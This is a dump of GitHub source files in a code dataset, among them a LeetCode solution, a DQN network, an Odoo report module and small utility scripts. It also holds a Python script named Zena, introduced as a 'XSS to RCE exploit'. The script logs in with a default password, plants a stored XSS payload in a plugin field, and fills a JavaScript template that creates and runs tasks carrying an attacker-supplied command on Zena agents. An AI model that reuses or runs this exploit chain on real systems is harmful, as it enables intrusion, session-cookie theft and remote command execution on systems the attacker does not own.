are also given an integer success. A spell and potion pair is considered successful if the product of their\nstrengths is at least success.\n\nReturn an integer array pairs of length n where pairs[i] is the number of potions that will form a successful pair\nwith the ith spell.\n\nExample 1:\n\nInput: spells = [5,1,3], potions = [1,2,3,4,5], success = 7\nOutput: [4,0,3]\nExplanation:\n- 0th spell: 5 * [1,2,3,4,5] = [5,10,15,20,25]. 4 pairs are successful.\n- 1st spell: 1 * [1,2,3,4,5] = [1,2,3,4,5]. 0 pairs are successful.\n- 2nd spell: 3 * [1,2,3,4,5] = [3,6,9,12,15]. 3 pairs are successful.\nThus, [4,0,3] is returned.\n\nExample 2:\n\nInput: spells = [3,1,2], potions = [8,5,8], success = 16\nOutput: [2,0,2]\nExplanation:\n- 0th spell: 3 * [8,5,8] = [24,15,24]. 2 pairs are successful.\n- 1st spell: 1 * [8,5,8] = [8,5,8]. 0 pairs are successful.\n- 2nd spell: 2 * [8,5,8] = [16,10,16]. 
2 pairs are successful.\r\nThus, [2,0,2] is returned.\r\n\r\n\r\nConstraints:\r\n\r\nn == spells.length\r\nm == potions.length\r\n1 <= n, m <= 10^5\r\n1 <= spells[i], potions[i] <= 10^5\r\n1 <= success <= 10^10\r\n\"\"\"\r\nfrom bisect import bisect\r\nfrom typing import List\r\n\r\n\r\nclass Solution:\r\n    def int_array(self, spell: int, potions: list[int]) -> List[int]:\r\n        return [num * spell for num in potions]\r\n\r\n    def check_success(self, int_array: list[int], success: int) -> list[int]:\r\n        return [num for num in int_array if num >= success]\r\n\r\n    def successfulPairs1(self, spells: List[int], potions: List[int], success: int) -> List[int]:\r\n        result = []\r\n\r\n        for spell in spells:\r\n            int_array = self.int_array(spell, sorted(potions))\r\n            result.append(len(self.check_success(int_array, success)))\r\n\r\n        return result\r\n\r\n    def successfulPairs(self, spells: List[int], potions: List[int], success: int) -> List[int]:\r\n        n, m = len(spells), len(potions)\r\n\r\n        pairs = [0] * n\r\n        potions.sort()\r\n\r\n        for i in range(n):\r\n            spell = spells[i]\r\n            left = 0\r\n            right = m - 1\r\n            while left <= right:\r\n                mid = left + (right - left) // 2\r\n                product = spell * potions[mid]\r\n                if product >= success:\r\n                    right = mid - 1\r\n                else:\r\n                    left = mid + 1\r\n            pairs[i] = m - left\r\n\r\n        return pairs\r\n\r\n\r\nsolution = Solution()\r\nprint(solution.successfulPairs(spells=[5, 1, 3], potions=[1, 2, 3, 4, 5], success=7))\r\nprint(solution.successfulPairs(spells = [3,1,2], potions = [8,5,8], success = 16))\r\nprint(solution.successfulPairs(spells = [3,1,2], potions = [1,2,3,4,5], success = 16))\r\n", "repo_name": "ImSakunthala/leetcode", "sub_path": "Intermediate_level/array/successful_pairs_of_spells_and_portions.py", "file_name": "successful_pairs_of_spells_and_portions.py", "file_ext": "py", "file_size_in_byte": 2792, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "typing.List", "line_number": 44, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 50, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 59, "usage_type": "name"}]}
+{"seq_id": "8494739205", "text": "from gym import spaces\r\nimport torch.nn as nn\r\nimport numpy as np\r\nimport torch\r\n\r\ndevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\r\n\r\nclass DQN(nn.Module):\r\n    \"\"\"\r\n    A basic implementation of a Deep Q-Network. 
The architecture is the same as that described in the\r\n    Nature DQN paper.\r\n    \"\"\"\r\n\r\n    def __init__(self, glyphs: spaces.Box, action_space: spaces.Discrete):\r\n        \"\"\"\r\n        Initialise the DQN\r\n        :param glyphs: the glyph observation space of the environment\r\n        :param action_space: the action space of the environment\r\n        \"\"\"\r\n        super().__init__()\r\n        #create a CNN with 3 convolutional layers and 2 fully connected layers\r\n        self.action_space = action_space.n\r\n        self.conv1 = nn.Conv2d(1, 32, kernel_size=3, stride=1)\r\n        self.conv2 = nn.Conv2d(32, 64, kernel_size=3, stride=1)\r\n        self.conv3 = nn.Conv2d(64, 64, kernel_size=3, stride=1)\r\n\r\n        self.fc1 = nn.Linear(576, 512)\r\n        self.fc2 = nn.Linear(512, action_space.n) #outputs tensor with an action value\r\n\r\n    def forward(self, new_glyphs):\r\n        x_glyphs = new_glyphs.unsqueeze(1).float() \r\n\r\n        # Implement the Deep Q-Network\r\n        x = nn.functional.relu(self.conv1(x_glyphs))\r\n        x = nn.functional.relu(self.conv2(x))\r\n        x = nn.functional.relu(self.conv3(x))\r\n\r\n        #Flatten the 4D tensor (batch_size x color_channel x stack x dimensions) to 2D tensor\r\n        x = nn.functional.relu(self.fc1(x.view(x.size(0), -1)))\r\n        return self.fc2(x)\r\n", "repo_name": "ClaudzTheEngineer/COMS4047_Assignment", "sub_path": "dqn/model.py", "file_name": "model.py", "file_ext": "py", "file_size_in_byte": 1466, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "torch.nn.Module", "line_number": 6, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 6, "usage_type": "name"}, {"api_name": "gym.spaces.Box", "line_number": 12, "usage_type": "attribute"}, {"api_name": "gym.spaces", "line_number": 12, "usage_type": "name"}, {"api_name": "gym.spaces.Discrete", "line_number": 12, "usage_type": "attribute"}, {"api_name": "torch.nn.Conv2d", "line_number": 21, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 21, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 22, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 22, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 23, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 23, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 25, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 25, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 26, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 26, "usage_type": "name"}, {"api_name": "torch.nn.functional.relu", "line_number": 32, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 32, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 32, "usage_type": "name"}, {"api_name": "torch.nn.functional.relu", "line_number": 33, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 33, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 33, "usage_type": "name"}, {"api_name": "torch.nn.functional.relu", "line_number": 34, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 34, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 34, "usage_type": "name"}, {"api_name": "torch.nn.functional.relu", "line_number": 37, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 37, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 37, "usage_type": "name"}]}
+{"seq_id": "39741808798", "text": "from odoo.osv 
import osv\nfrom operator import itemgetter\nfrom odoo import _\nimport odoo\nfrom odoo import api\nfrom odoo import models\nfrom odoo.addons.plm.report.book_collector import BookCollector\nfrom odoo.addons.plm.report.book_collector import getBottomMessage\n\nfrom odoo.tools import DEFAULT_SERVER_DATETIME_FORMAT\nimport time\nfrom io import BytesIO\nimport base64\nimport os\nimport logging\nfrom datetime import datetime\nfrom dateutil import tz\n\n\nfrom PyPDF2 import PdfFileWriter\nfrom PyPDF2 import PdfFileReader\n\n\ndef isPdf(fileName):\n    if (os.path.splitext(fileName)[1].lower() == '.pdf'):\n        return True\n    return False\n\n\ndef getDocumentStream(docRepository, objDoc):\n    \"\"\"\n    Gets the stream of a file\n    \"\"\"\n    content = False\n    try:\n        if (not objDoc.store_fname) and (objDoc.db_datas):\n            content = base64.b64decode(objDoc.db_datas)\n        else:\n            with open(os.path.join(docRepository, objDoc.store_fname), 'rb') as f:\n                content = f.read()\n    except Exception as ex:\n        logging.error(\"getFileStream : Exception (%s) reading stream on file : %s.\" % (ex, objDoc.datas_fname))\n    return content\n\n\ndef _translate(value):\n    return _(value)\n\n\ndef BomSort(myObject):\n    bomobject = []\n    res = {}\n    index = 0\n    for l in myObject:\n        res[str(index)] = l.itemnum\n        index += 1\n    items = list(res.items())\n    items.sort(key=itemgetter(1))\n    for res in items:\n        bomobject.append(myObject[int(res[0])])\n    return bomobject\n\n\ndef get_parent(myObject):\n    return [myObject.product_tmpl_id.name,\n            '',\n            _(myObject.product_tmpl_id.name) or _(myObject.product_tmpl_id.default_code),\n            myObject.product_tmpl_id.engineering_revision,\n            _(myObject.product_tmpl_id.description),\n            '',\n            '',\n            myObject.product_qty,\n            '',\n            myObject.weight_net,\n            ]\n\n\nclass report_spare_parts_header(models.AbstractModel):\n    _name = 'report.plm_spare.bom_spare_header'\n\n    def get_document_brws(self, objProduct):\n        oldest_obj = None\n        oldest_dt = None\n        if objProduct:\n            for linkedBrwsDoc in objProduct.linkeddocuments:\n                create_date_str = linkedBrwsDoc.create_date\n                create_date = datetime.strptime(create_date_str, DEFAULT_SERVER_DATETIME_FORMAT)\n                if oldest_dt is None or create_date < oldest_dt:\n                    oldest_dt = create_date\n                    oldest_obj = linkedBrwsDoc\n        return oldest_obj\n\n    def get_report_values(self, docids, data=None):\n        products = self.env['product.product'].browse(docids)\n        return {'docs': products,\n                'time': time,\n                'get_document_brws': self.get_document_brws}\n\n\nclass ReportSpareDocumentOne(models.AbstractModel):\n    _name = 'report.plm_spare.pdf_one'\n    \"\"\"\n    Calculates the bom structure spare parts manual\n    \"\"\"\n\n    @api.model\n    def create(self, components):\n        recursion = True\n        if ReportSpareDocumentOne._name == 'report.plm_spare.pdf_one':\n            recursion = False\n        self.processedObjs = []\n\n        componentType = self.env['product.product']\n        bomType = self.env['mrp.bom']\n        user = self.env['res.users'].browse(self.env.uid)\n        msg = getBottomMessage(user, self.env.context)\n        mainBookCollector = BookCollector(customTest=(True, msg))\n        for component in components:\n            self.processedObjs = []\n            buf = self.getFirstPage([component.id])\n            mainBookCollector.addPage((buf, ''))\n            self.getSparePartsPdfFile(component, mainBookCollector, componentType, bomType, recursion)\n        if mainBookCollector is not None:\n            pdf_string = BytesIO()\n            mainBookCollector.collector.write(pdf_string)\n            out = pdf_string.getvalue()\n            pdf_string.close()\n            byteString = b\"data:application/pdf;base64,\" + base64.b64encode(out)\n            return byteString.decode('UTF-8')\n        logging.warning('Unable 
to create PDF')\n return (False, '')\n\n def getSparePartsPdfFile(self, product, output, componentTemplate, bomTemplate, recursion):\n packedObjs = []\n packedIds = []\n if product in self.processedObjs:\n return\n bomBrwsIds = bomTemplate.search([('product_id', '=', product.id), ('type', '=', 'spbom')])\n if len(bomBrwsIds) < 1:\n bomBrwsIds = bomTemplate.search([('product_tmpl_id', '=', product.product_tmpl_id.id), ('type', '=', 'spbom')])\n if len(bomBrwsIds) > 0:\n if bomBrwsIds:\n self.processedObjs.append(product)\n for bom_line in bomBrwsIds.bom_line_ids:\n packedObjs.append(bom_line.product_id)\n packedIds.append(bom_line.id)\n if len(packedIds) > 0:\n for pageStream in self.getPdfComponentLayout(product):\n try:\n output.addPage((pageStream, ''))\n except Exception as ex:\n logging.error(ex)\n raise ex\n pdf = self.env.ref('plm.report_plm_bom_structure_one').sudo().render_qweb_pdf(bomBrwsIds.ids)[0]\n pageStream = BytesIO()\n pageStream.write(pdf)\n output.addPage((pageStream, ''))\n if recursion:\n for packedObj in packedObjs:\n if packedObj not in self.processedObjs:\n self.getSparePartsPdfFile(packedObj, output, componentTemplate, bomTemplate, recursion)\n\n def getPdfComponentLayout(self, component):\n ret = []\n docRepository = self.env['plm.document']._get_filestore()\n for document in component.linkeddocuments:\n if (document.usedforspare) and (document.type == 'binary'):\n if document.printout and str(document.printout) != 'None':\n ret.append(BytesIO(base64.b64decode(document.printout)))\n elif isPdf(document.datas_fname):\n value = getDocumentStream(docRepository, document)\n if value:\n ret.append(BytesIO(value))\n return ret\n\n def getFirstPage(self, ids):\n strbuffer = BytesIO()\n # todo: si rompe qui con v11 .. capire come fare il report da codice \n pdf = self.env.ref('plm_spare.report_product_product_spare_header').sudo().render_qweb_pdf(ids)[0]\n strbuffer.write(pdf)\n return strbuffer\n\n @api.model\n def get_report_values(self, docids, data=None):\n documents = self.env['product.product'].browse(docids)\n return {'docs': documents,\n 'get_content': self.create}\n\n\nclass ReportSpareDocumentAll(ReportSpareDocumentOne):\n _name = 'report.plm_spare.pdf_all'\n", "repo_name": "kulius/odoo11_uw", "sub_path": "custom/plm_spare-11.0.1.1/plm_spare/report/spare_parts_manual.py", "file_name": "spare_parts_manual.py", "file_ext": "py", "file_size_in_byte": 6953, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "os.path.splitext", "line_number": 25, "usage_type": "call"}, {"api_name": "os.path", "line_number": 25, "usage_type": "attribute"}, {"api_name": "base64.b64decode", "line_number": 37, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 39, "usage_type": "call"}, {"api_name": "os.path", "line_number": 39, "usage_type": "attribute"}, {"api_name": "logging.error", "line_number": 42, "usage_type": "call"}, {"api_name": "odoo._", "line_number": 47, "usage_type": "call"}, {"api_name": "operator.itemgetter", "line_number": 58, "usage_type": "call"}, {"api_name": "odoo._", "line_number": 67, "usage_type": "call"}, {"api_name": "odoo._", "line_number": 69, "usage_type": "call"}, {"api_name": "odoo.models.AbstractModel", "line_number": 78, "usage_type": "attribute"}, {"api_name": "odoo.models", "line_number": 78, "usage_type": "name"}, {"api_name": "datetime.datetime.strptime", "line_number": 87, "usage_type": "call"}, {"api_name": "odoo.tools.DEFAULT_SERVER_DATETIME_FORMAT", 
"line_number": 87, "usage_type": "argument"}, {"api_name": "datetime.datetime", "line_number": 87, "usage_type": "name"}, {"api_name": "odoo.models.AbstractModel", "line_number": 100, "usage_type": "attribute"}, {"api_name": "odoo.models", "line_number": 100, "usage_type": "name"}, {"api_name": "odoo.addons.plm.report.book_collector.getBottomMessage", "line_number": 116, "usage_type": "call"}, {"api_name": "odoo.addons.plm.report.book_collector.BookCollector", "line_number": 117, "usage_type": "call"}, {"api_name": "io.BytesIO", "line_number": 124, "usage_type": "call"}, {"api_name": "base64.b64encode", "line_number": 128, "usage_type": "call"}, {"api_name": "logging.warning", "line_number": 130, "usage_type": "call"}, {"api_name": "odoo.api.model", "line_number": 106, "usage_type": "attribute"}, {"api_name": "odoo.api", "line_number": 106, "usage_type": "name"}, {"api_name": "logging.error", "line_number": 152, "usage_type": "call"}, {"api_name": "io.BytesIO", "line_number": 155, "usage_type": "call"}, {"api_name": "io.BytesIO", "line_number": 169, "usage_type": "call"}, {"api_name": "base64.b64decode", "line_number": 169, "usage_type": "call"}, {"api_name": "io.BytesIO", "line_number": 173, "usage_type": "call"}, {"api_name": "io.BytesIO", "line_number": 177, "usage_type": "call"}, {"api_name": "odoo.api.model", "line_number": 183, "usage_type": "attribute"}, {"api_name": "odoo.api", "line_number": 183, "usage_type": "name"}]} +{"seq_id": "36318218832", "text": "from sklearn.pipeline import Pipeline\nfrom sklearn.preprocessing import StandardScaler\nnum_pipeline = Pipeline([\n('imputer', SimpleImputer(strategy=\"median\")),\n('attribs_adder', CombinedAttributesAdder()),\n('std_scaler', StandardScaler()), # alternative: MinMaxScaler()\n])\ndataset_num_tr = num_pipeline.fit_transform(dataset_num)\n\n\n# one transformer to take care of all numeric and categorical columns:\nfrom sklearn.compose import ColumnTransformer\nnum_attribs = list(dataset_num) # get numeric columns\ncat_attribs = [\"categorical_columns\"] # get catgorical columns\nfull_pipeline = ColumnTransformer([\n(\"num\", num_pipeline, num_attribs),\n(\"cat\", OneHotEncoder(), cat_attribs),\n])\ndataset_prepared = full_pipeline.fit_transform(dataset)\n", "repo_name": "guochen-code/Hands-on-Machine-Learning", "sub_path": "Transformation Pipelines.py", "file_name": "Transformation Pipelines.py", "file_ext": "py", "file_size_in_byte": 736, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "sklearn.pipeline.Pipeline", "line_number": 3, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.StandardScaler", "line_number": 6, "usage_type": "call"}, {"api_name": "sklearn.compose.ColumnTransformer", "line_number": 15, "usage_type": "call"}]} +{"seq_id": "22713885401", "text": "import logging\nimport os.path\nimport subprocess\nimport platform\nimport util.timeout\n\n\ndef get_install_folder_and_version() -> tuple:\n \"\"\"Gets the version and install path of OpenRCT2 from the Windows Registry.\n\n :return: Tuple with installation path an version string respectively. 
If an installation is not found, a tuple of None and None are returned.\n :rtype: tuple\n \"\"\"\n # Only Windows has the winreg package, so make sure the script doesn't go apeshit in other systems\n if platform.system() == \"Windows\":\n import winreg\n logging.info(\"Attempting to find Windows install...\")\n\n access_registry = winreg.ConnectRegistry(None, winreg.HKEY_LOCAL_MACHINE)\n openrct2_key_location = r\"SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\OpenRCT2\"\n\n try:\n access_key = winreg.OpenKey(access_registry, openrct2_key_location)\n except FileNotFoundError:\n logging.warning(\"OpenRCT2 installation not found\")\n return None, None\n\n install_location = winreg.QueryValueEx(access_key, \"Install Folder\")[0]\n version = winreg.QueryValueEx(access_key, \"DisplayVersion\")[0]\n\n logging.debug(f\"Found install info - Location: {install_location}\")\n\n return install_location, version\n\n\n@util.timeout.exit_after(180)\ndef do_silent_install(temp_dir: str, installer_path: str):\n \"\"\"Runs a NSIS-based installer in silent mode under a subprocess and waits for it to finish.\n\n :param temp_dir: Temporary directory to be used\n :type temp_dir: str\n :param installer_path: Path where the .zip containing the .app folder is located\n :type installer_path: str\n \"\"\"\n logging.info(\"Installing for Windows...\")\n\n command = f\"\\\"{os.path.join(temp_dir, installer_path)}\\\" /S\"\n logging.debug(f\"Running command: {command}\")\n process = subprocess.Popen(command, shell=True)\n process.wait()\n", "repo_name": "androidWG/Corkscrew", "sub_path": "install/windows.py", "file_name": "windows.py", "file_ext": "py", "file_size_in_byte": 1915, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "platform.system", "line_number": 15, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 17, "usage_type": "call"}, {"api_name": "winreg.ConnectRegistry", "line_number": 19, "usage_type": "call"}, {"api_name": "winreg.HKEY_LOCAL_MACHINE", "line_number": 19, "usage_type": "attribute"}, {"api_name": "winreg.OpenKey", "line_number": 23, "usage_type": "call"}, {"api_name": "logging.warning", "line_number": 25, "usage_type": "call"}, {"api_name": "winreg.QueryValueEx", "line_number": 28, "usage_type": "call"}, {"api_name": "winreg.QueryValueEx", "line_number": 29, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 31, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 45, "usage_type": "call"}, {"api_name": "os.path.path.join", "line_number": 47, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 47, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 47, "usage_type": "name"}, {"api_name": "logging.debug", "line_number": 48, "usage_type": "call"}, {"api_name": "subprocess.Popen", "line_number": 49, "usage_type": "call"}, {"api_name": "util.timeout.timeout.exit_after", "line_number": 36, "usage_type": "call"}, {"api_name": "util.timeout.timeout", "line_number": 36, "usage_type": "attribute"}, {"api_name": "util.timeout", "line_number": 36, "usage_type": "name"}]} +{"seq_id": "20377787241", "text": "import asyncio\nimport subprocess\nimport sys\n\nfrom asyncio import Future\nfrom asyncio.subprocess import DEVNULL\nfrom typing import Optional\nfrom typing import Tuple\nfrom typing import Union\n\n\nclass NonZeroExitCode(Exception):\n def __init__(self, program, args, exit_code, stdout, stderr):\n 
super().__init__(f\"{program} {args} exited with {exit_code}\")\n self.program = program\n self.program_args = args\n self.exit_code = exit_code\n self.stdout = stdout\n self.stderr = stderr\n\n\nasync def system(\n program,\n *args,\n stdin=None,\n stdout_raw=False,\n stdout_text=False,\n stdout_stripped=False,\n stderr=True,\n stderr_text=False,\n stdout_future=False,\n **kwargs,\n) -> Union[None, str, bytes, Tuple[subprocess.Popen, Future]]:\n if hasattr(stdin, \"read\"):\n stdin_file = stdin\n stdin_text = \"\"\n elif isinstance(stdin, str):\n stdin_file = subprocess.PIPE\n stdin_text = stdin\n else:\n stdin_file = subprocess.PIPE\n stdin_text = \"\"\n capture_stdout = stdout_raw or stdout_text or stdout_stripped\n\n if capture_stdout:\n stdout = subprocess.PIPE\n else:\n stdout = sys.stdout\n\n capture_stderr = stderr and stderr_text\n if capture_stderr:\n stderr = subprocess.PIPE\n elif stderr:\n stderr = sys.stderr\n else:\n stderr = DEVNULL\n\n loop = asyncio.get_running_loop()\n process = subprocess.Popen(\n [program, *args],\n stdin=stdin_file,\n stdout=stdout,\n stderr=stderr,\n **kwargs,\n )\n\n async def get_output(output_future: Optional[Future] = None):\n if stdin_file == subprocess.PIPE:\n stdout, stderr = await loop.run_in_executor(\n None, lambda: process.communicate(stdin_text.encode(\"utf-8\"))\n )\n else:\n stdout, stderr = await loop.run_in_executor(\n None, lambda: process.communicate()\n )\n\n output = None\n if capture_stdout:\n if stdout_raw:\n output = stdout\n else:\n stdout_text = stdout.decode(\"utf-8\")\n if stdout_stripped:\n stdout_text = stdout_text.strip()\n output = stdout_text\n\n exit_code = process.returncode\n exception = None\n if exit_code != 0:\n exception = NonZeroExitCode(\n program,\n args,\n exit_code,\n stdout.decode(\"utf-8\")\n if isinstance(stdout, bytes)\n else stdout,\n stderr.decode(\"utf-8\")\n if isinstance(stderr, bytes)\n else stderr,\n )\n\n if stdout_future and exception:\n output_future.set_exception(exception)\n elif stdout_future and output_future:\n output_future.set_result(output)\n elif exception:\n raise exception\n\n return output\n\n if stdout_future:\n output_future = loop.create_future()\n loop.create_task(get_output(output_future))\n return process, output_future\n else:\n return await get_output()\n\n\ndef system_sync(*args, **kwargs):\n return asyncio.run(system(*args, **kwargs))\n", "repo_name": "meya-customers/meya-sdk", "sub_path": "meya/util/system.py", "file_name": "system.py", "file_ext": "py", "file_size_in_byte": 3270, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "subprocess.PIPE", "line_number": 38, "usage_type": "attribute"}, {"api_name": "subprocess.PIPE", "line_number": 41, "usage_type": "attribute"}, {"api_name": "subprocess.PIPE", "line_number": 46, "usage_type": "attribute"}, {"api_name": "sys.stdout", "line_number": 48, "usage_type": "attribute"}, {"api_name": "subprocess.PIPE", "line_number": 52, "usage_type": "attribute"}, {"api_name": "sys.stderr", "line_number": 54, "usage_type": "attribute"}, {"api_name": "asyncio.subprocess.DEVNULL", "line_number": 56, "usage_type": "name"}, {"api_name": "asyncio.get_running_loop", "line_number": 58, "usage_type": "call"}, {"api_name": "subprocess.Popen", "line_number": 59, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 67, "usage_type": "name"}, {"api_name": "asyncio.Future", "line_number": 67, "usage_type": "name"}, {"api_name": "subprocess.PIPE", 
"line_number": 68, "usage_type": "attribute"}, {"api_name": "typing.Union", "line_number": 33, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 33, "usage_type": "name"}, {"api_name": "subprocess.Popen", "line_number": 33, "usage_type": "attribute"}, {"api_name": "asyncio.Future", "line_number": 33, "usage_type": "name"}, {"api_name": "asyncio.run", "line_number": 120, "usage_type": "call"}]} +{"seq_id": "11427205043", "text": "from rest_framework import serializers\nfrom .models import *\n\n\nclass CreateFundingSerializer(serializers.ModelSerializer):\n\n class Meta:\n model = Funding\n fields = ['creator_id', 'type', 'fund_cause', 'phone_number', 'total_fund',\n 'amount_raise', 'description', 'image', 'is_closed', 'is_verified', 'ngo_certificate']\n\n def create(self, validated_data):\n creator = User.objects.get(id=validated_data['creator_id'].id)\n validated_data['created_id'] = creator\n fund = Funding.objects.create(\n creator_id=validated_data['creator_id'],\n type=validated_data['type'],\n fund_cause=validated_data['fund_cause'],\n phone_number=validated_data['phone_number'],\n total_fund=validated_data['total_fund'],\n amount_raise=validated_data['amount_raise'],\n description=validated_data['description'],\n image=validated_data['image'],\n is_closed=validated_data['is_closed'],\n is_verified=validated_data['is_verified'],\n ngo_certificate=validated_data['ngo_certificate']\n )\n return fund\n\n\n# class FundingCrowdSerializer(serializer.ModelSerializer):\n# image_url = serializers.SerializerMethodField('get_image_url')\n\n# class Meta:\n# model = Funding\n# fields = ['creator_id', 'type', 'fund_cause', 'phone_number', 'total_fund',\n# 'amount_raise', 'description', 'image', 'is_closed', 'is_verified', 'ngo_certificate', 'image']\n\n# def get_image_url(self, obj):\n# request = self.context.get(\"request\")\n# return request.build_absolute_uri(obj.image.url)\n\n\nclass UpdateFundingSerializer(serializers.ModelSerializer):\n\n class Meta:\n model = FundingUpdates\n fields = '__all__'\n\n def create(self, validated_data):\n funding = Funding.objects.get(\n id=validated_data['funding_id'].id)\n validated_data['funding_id'] = funding\n return FundingUpdates.objects.create(**validated_data)\n\n\nclass CommentFundingSerializer(serializers.ModelSerializer):\n\n class Meta:\n model = FundingComments\n fields = '__all__'\n\n def create(self, validated_data):\n funding = Funding.objects.get(id=validated_data['funding_id'].id)\n user_id = User.objects.get(id=validated_data['user_id'].id)\n validated_data['funding_id'] = funding\n validated_data['user_id'] = user_id\n return FundingComments.objects.create(**validated_data)\n", "repo_name": "shreyasrami/LOC4.0_RuntimeTerror", "sub_path": "server/crowdfunding/serializers.py", "file_name": "serializers.py", "file_ext": "py", "file_size_in_byte": 2529, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "rest_framework.serializers.ModelSerializer", "line_number": 5, "usage_type": "attribute"}, {"api_name": "rest_framework.serializers", "line_number": 5, "usage_type": "name"}, {"api_name": "rest_framework.serializers.ModelSerializer", "line_number": 44, "usage_type": "attribute"}, {"api_name": "rest_framework.serializers", "line_number": 44, "usage_type": "name"}, {"api_name": "rest_framework.serializers.ModelSerializer", "line_number": 57, "usage_type": "attribute"}, {"api_name": "rest_framework.serializers", "line_number": 57, "usage_type": "name"}]} 
+{"seq_id": "73845178113", "text": "# Zena XSS to RCE exploit. Exploit is reliant on a credential cookie theft to perform RCE component.\n\nimport os\nimport sys\nimport json\nimport requests\n\n\nclass CookieMonster:\n\n def __init__(self, host, port, tls, cmd):\n if tls is True:\n self.host = \"https://\" + host + \":\" + port\n else:\n self.host = \"http://\" + host + \":\" + port\n self.cmd = cmd\n self.webConfigLogin = [\"GET\", \"/oc_main/cm/clientManager/login?pwd=zena\"]\n self.webConfigPlugin = [\"PUT\", \"/oc_main/cm/zenaPlugins\"]\n self.clientMgrCreateTsk = [\"POST\", \"/oc_main/zenaweb/definitions\"]\n self.clientMgrExecTsk = [\"POST\", \"\"]\n self.getUsers = [\"GET\", \"/oc_main/zenaweb/definitions/logins\"]\n self.getAgents = [\"GET\", \"/oc_main/zenaweb/agents\"]\n self.userAgent = \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36\"\n\n def controller(self):\n sessionID = self.login()\n self.XSS(sessionID)\n\n def login(self):\n\n headers = {\n \"Host\": self.host,\n \"User-Agent\": self.userAgent,\n \"Accept\": \"*/*\",\n \"Accept-Language\": \"en-US,en;q=0.5\",\n \"Accept-Encoding\": \"gzip, deflate\",\n \"X-Requested-With\": \"XMLHttpRequest\",\n \"Connection\": \"close\",\n \"Referer\": self.host + \"/webconfig/index.html\"\n }\n req = requests.get(self.host + self.webConfigLogin[1], headers=headers)\n responseHeaders = json.dumps(dict(req.headers))\n responseHeaders = json.loads(responseHeaders)\n jsessionID = responseHeaders[\"Set-Cookie\"].split(\";\")[0]\n\n return jsessionID # To be used for malicious connector creation\n\n\n def XSS(self, sessionID):\n\n payload = {\n \"NAME\": \"\",\n \"DB_URL\": \"http://test.com\",\n \"DB_USER\": \"test\",\n \"DB_TYPE\": \"MSSQL\",\n \"DB_DRIVER\": \"com.microsoft.sqlserver.jdbc.SQLServerDriver\",\n \"DB_PASSWORD\": \"test\",\n \"DESCRIPTION\": \"test\",\n \"ENABLED\": \"true\"\n }\n\n headers = {\n \"Host\": self.host,\n \"User-Agent\": self.userAgent,\n \"Accept\": \"*/*\",\n \"Accept-Language\": \"en-US,en;q=0.5\",\n \"Accept-Encoding\": \"gzip, deflate\",\n \"Content-Type\": \"application/json\",\n \"X-Requested-With\": \"XMLHttpRequest\",\n \"Content-Length\": str(sys.getsizeof(payload)),\n \"Connection\": \"close\",\n \"Referer\": self.host + \"/webconfig/index.html\",\n \"Cookie\": sessionID\n }\n\n print(\"[+] Starting XSS..\")\n req = requests.put(self.host + self.webConfigPlugin[1], data=json.dumps(payload), headers=headers)\n response = str(req.content)\n if \"true\" in response:\n print(\"[+] Payload Successfully Delivered!\")\n\n def jsPayload(self):\n\n # Replace JS Placeholders with payload data\n payload = open(os.path.realpath(\"payload-js.txt\"), \"r\").read()\n payload = payload.replace(\"\", self.getUsers[0])\n payload = payload.replace(\"\", self.getUsers[1])\n payload = payload.replace(\"\", self.getAgents[0])\n payload = payload.replace(\"\", self.getAgents[1])\n payload = payload.replace(\"\", self.clientMgrCreateTsk[0])\n payload = payload.replace(\"\", self.host + self.clientMgrCreateTsk[1])\n payload = payload.replace(\"\", self.clientMgrExecTsk[0])\n payload = payload.replace(\"\", self.host)\n payload = payload.replace(\"\", self.cmd)\n\n return payload\n\n\nif __name__ == '__main__':\n # Args\n host = str(sys.argv[1])\n port = str(sys.argv[2])\n tls = str(sys.argv[3])\n cmd = str(sys.argv[4])\n # Exec\n CookieMonster(host, port, tls, cmd).controller()\n", "repo_name": "JetP1ane/Zena", "sub_path": 